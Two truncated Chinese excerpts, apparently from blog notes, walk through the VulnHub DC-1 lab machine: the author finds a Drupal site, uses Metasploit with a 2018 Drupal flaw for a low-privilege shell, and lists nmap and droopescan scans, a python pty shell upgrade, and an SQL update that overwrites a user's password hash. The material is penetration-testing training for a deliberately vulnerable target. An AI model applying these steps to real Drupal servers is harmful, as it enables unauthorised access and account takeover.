VulnHub DC-1靶机通关 Vulnhub DC-1靶机通关 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 安装靶场,通过工具查找ip地址 打开界面,发现是Drupal建站系统 查找该CMS系统是否存在历史漏洞,可以看到该CMS存在历史漏洞。 使用msf利用该漏洞,查找到历史漏洞,我使用的是2018年的漏洞 执行命令获得一个低权限的shell...
靶机DC-1的通关笔记 nmap -A -sC -sS -n -Pn -vvv -oN DC-1192.168.1.156 droopescan scan drupal -u192.168.1.156 python -c'import pty;pty.spawn("/bin/bash")'#优化终端 https://www.drupal.org/node/1023428 ./scripts/password-hash.sh 12345 UPDATEusersSETpass='$S$DZyKe31ZRwS4msLQYHacPaiIp...